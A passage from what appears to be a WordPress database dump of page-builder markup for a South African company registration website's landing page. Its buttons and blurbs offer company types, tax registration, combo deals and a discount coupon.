button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"6px||-13px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_padding=\"1px|||||\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-9px||-13px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_margin=\"-9px||-13px||false|false\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.6\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 15:15:59','2019-08-08 13:15:59','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32425,3,'2019-08-08 15:19:46','2019-08-08 13:19:46','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"11px||6px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_padding=\"0px||0px||false|false\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"6px||6px||false|false\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_padding=\"0px||0px||false|false\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" 